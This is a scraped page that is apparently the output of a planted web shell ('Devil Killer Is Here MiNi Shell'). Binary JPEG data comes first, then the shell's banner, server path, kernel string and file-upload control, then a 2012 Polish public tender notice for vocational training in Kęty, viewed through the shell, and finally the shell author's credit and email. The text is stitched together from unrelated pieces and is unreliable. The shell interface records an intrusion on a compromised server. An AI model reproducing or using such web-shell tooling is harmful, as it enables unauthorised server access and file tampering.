JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120830/322100-N-2012.html

<p class="kh_header"><b>Kęty: zorganizowanie szkoleń zawodowych dla uczestników projektu Podmiot zatrudnienia socjalnego  partnerem Ośrodka Pomocy Społecznej i Powiatowego Urzędu Pracy w realizacji kontraktów socjalnych</b><br>
<b>Numer ogłoszenia: 322100 - 2012; data zamieszczenia: 30.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Żwirki i Wigury 8, 32-650 Kęty, woj. małopolskie, tel. 0-33 845 28 70, faks 0-33 844 86 64.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops.kety.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie szkoleń zawodowych dla uczestników projektu Podmiot zatrudnienia socjalnego  partnerem Ośrodka Pomocy Społecznej i Powiatowego Urzędu Pracy w realizacji kontraktów socjalnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Profesjonalne sprzątanie - dla 10 osób w jednej grupie szkoleniowej, w wymiarze 34 godzin w tym 18 godzin praktycznych. Program szkolenia powinien zapewnić uczestnikowi zapoznanie z: zasadami sprzątania wg nowoczesnych systemów utrzymania czystości, zasadami organizacji służb sprzątających, sprzętem sprzątającym, rodzajami środków chemicznych i dezynfekujących wykorzystywanych w wykonywaniu usług wewnątrz pomieszczeń i usług zewnętrznych. Każdy uczestnik powinien otrzymać na własność materiały szkoleniowe tj. podręcznik, notatnik, długopis, mieć zapewniony posiłek na każdy dzień szkolenia wraz z bufetem kawowym.
Miejsce szkolenia- Kęty zapewnia Wykonawca kursu
Jedna godzina szkolenia to 45 minut. 

II. Pracownik terenów zielonych - dla 10 osób w jednej grupie szkoleniowej, 
w wymiarze 127 godzin w tym 60 godzin praktycznych w terenie. Program szkolenia powinien zapewnić uczestnikowi zapoznanie z: podstawowymi wiadomościami 
z zakresu botaniki, roślinoznawstwa, przygotowania gleby, doboru roślin, sposobami uprawy najważniejszych typów gleb,, regulacją pH, rodzajami maszyn i sprzętów używanych przy urządzaniu terenów zielonych, zasadami nawożenia, doboru 
i pielęgnacji roślin, chorobami roślin i metodami ich zwalczania, sposobami zakładania oczek wodnych, systemem nawadniania,  zasadami BHP. Każdy uczestnik powinien otrzymać na własność materiały szkoleniowe tj. podręcznik, notatnik, długopis, mieć zapewniony posiłek na każdy dzień szkolenia wraz z bufetem kawowym oraz materiały niezbędne do przeprowadzenia zajęć tj. podręczne narzędzia ogrodnicze, odzież ochronną.
Miejsce szkolenia- Kęty zapewnia Wykonawca kursu
Jedna godzina szkolenia to 45 minut. 

III. Kucharz małej gastronomii z elementami cateringu - dla 10 osób w jednej grupie szkoleniowej, w wymiarze 110 godzin w tym 88 godzin praktycznych. Program szkolenia powinien zapewnić uczestnikowi zapoznanie z: zasadami i wymaganiami 
w zakresie żywienia gości, zasadami GMP/GHP, zasadami profesjonalnej obsługi klienta konsumenta, rodzajami maszyn, narzędzi i sprzętu gastronomicznego, organizacji przyjęć okolicznościowych (catering), pakowaniem żywności. Każdy uczestnik powinien otrzymać na własność materiały szkoleniowe tj. podręcznik, notatnik, długopis, mieć zapewnioną możliwość przygotowania posiłku oraz jego konsumpcji na każdy dzień szkolenia wraz z bufetem kawowym oraz materiały niezbędne do przeprowadzenia zajęć tj. produkty, odzież ochronną oraz badania sanitarno - epidemiologiczne.
Miejsce szkolenia- Kęty zapewnia Wykonawca kursu
Jedna godzina szkolenia to 45 minut. 

IV. ABC własnego biznesu - dla 10 osób w jednej grupie szkoleniowej w wymiarze 58 godzin, w tym 40 godzin praktycznych. Program szkolenia powinien zapewnić uczestnikowi zapoznanie z: zagadnieniami prawnymi dotyczącymi prowadzenia własnej działalności gospodarczej, dokumentacją księgową, zasadami opodatkowania, prawem pracy, źródłami finansowania własnej działalności gospodarczej. Każdy uczestnik powinien otrzymać na własność materiały szkoleniowe tj. podręcznik, notatnik, długopis, kalkulator, mieć zapewniony posiłek na każdy dzień szkolenia wraz z bufetem kawowym.
Miejsce szkolenia- Kęty zapewnia Wykonawca kursu
Jedna godzina szkolenia to 45 minut.
POSTANOWIENIA DODATKOWE WSPÓLNE DLA WSZYSTKICH SZKOLEŃ
1.Wszystkie szkolenia powinny się zakończyć egzaminem wewnętrznym. Po zakończeniu kursu Wykonawca zobowiązany jest wydać każdemu uczestnikowi dokument potwierdzający kwalifikacje zawodowe na druku MEN. 
2.Wykonawca zobowiązuje się:
- wykonać usługę będącą przedmiotem zlecenia zgodnie z aktualnym poziomem wiedzy obowiązującym prawem i postanowieniami umowy przy dołożeniu należytej staranności,
- ubezpieczyć uczestników  kursu od następstw nieszczęśliwych wypadków. Polisa ubezpieczenia powinna zostać okazana Zamawiającemu na minimum jeden dzień przed rozpoczęciem kursu. Bez okazania polisy rozpoczęcie kursu nie będzie możliwe, 
- opracować program kursu tak aby był zgodny z wymogami określonymi w przepisach rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. z 2006 r. Nr 31, poz. 216).Wykonawca zobowiązany jest dołączyć do oferty program szkolenia,
- realizować zamówienie zgodnie z ustawą o ochronie danych osobowych, przepisów BHP i Ppoż.
- umożliwić Zamawiającemu wgląd w dokumentacje kursu.
3.Zamawiający zastrzega sobie prawo do przeprowadzenia kontroli w zakresie realizacji przedmiotu umowy w tym prawo uczestnictwa w pierwszych i ostatnich zajęciach kursu.  
4.Wykonanwca zobowiązany jest wskazać w ofercie miejsce prowadzenia zajęć. Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował: potencjałem technicznym (lokal, wyposażenie, sprzęt, urządzenia, stanowiska komputerowe, sprzęt gastronomiczny, sprzęt ogrodniczy, sprzątający) adekwatnym do zamówienia umożliwiającym realizację szkoleń. 
Warunkiem udziału w postepowaniu jest dostarczenie:
1.Oferty szkoleniowej według załączonego wzoru ( załącznik nr 1)
2.Programu  i harmonogramu szkolenia. 
3.Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej. W przypadku powyższych dokumentów za aktualne uważa się dokumenty wystawione nie wcześniej niż 6 miesięcy prze upływem terminu składania ofert. 
4.Podpisanego oświadczenia o spełnianiu warunków udziału w postepowaniu wskazanych w art. 22 ust. 1  oraz niepodleganiu wykluczeniu z postępowania  art. 24 ust. 1 i 2 ustawy Pzp ( załącznik nr 2)
5.Wykaz osób przeprowadzających szkolenia, a także ich kwalifikacje zawodowe doświadczenie i wykształcenie niezbędne do wykonania zamówienia ( załącznik nr 4)
6.Pełnomocnictwo, gdy Wykonawcę reprezentuje pełnomocnik.
7.W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postepowaniu i zawarcia umowy. 
8.Oświadczenie o akceptacji SIWZ i potwierdzenie zapoznania się z warunkami umowy (załącznik nr 3)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oferta szkoleniowa według załączonego wzoru ( załącznik nr 1)
2.Program  i harmonogram szkolenia
3.Pełnomocnictwo, gdy Wykonawcę reprezentuje pełnomocnik.
4.Oświadczenie o akceptacji SIWZ i potwierdzenie zapoznania się z warunkami umowy (załącznik nr 3).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Zapewnienie bazy szkoleniowej na terenie Kęt (własność, umowa najmu, umowa dzierżawy itp.) - 20</li>
<li>3 - Posiadanie certyfikatu systemu zarządzania jakością ISO lub  Akredytacji Kuratora Oświaty do prowadzenia szkoleń i kursów - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany terminu rozpoczęcia lub zakończenia szkolenia wywołanej w szczególności nie skompletowaniem na czas pełnej grupy szkoleniowej lub przyczynami niezależnymi od Wykonawcy i Zamawiającego (np. działania siły wyższej).
2.Zmiany w kadrze dydaktycznej, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Wykonawcy. Zmiana ta nie może prowadzić do obniżenia wymagań określonych w SIWZ. Jeżeli Zamawiający uzna, że przyczyna jest uzasadniona Wykonawca musi przedstawić nową kandydaturę o kwalifikacjach spełniających kryteria zawarte w SIWZ.
3.Zmiany harmonogramu zajęć - w uzasadnionych przypadkach i za zgodą Zamawiającego.
4.Zmiany ilości osób skierowanych na szkolenie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gops.kety.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej
ul. Żwirki i Wigury 8
32-650 Kęty.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2012 godzina 10:00, miejsce: Gminny Ośrodek Pomocy Społecznej
ul. Żwirki i Wigury 8
32-650 Kęty.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com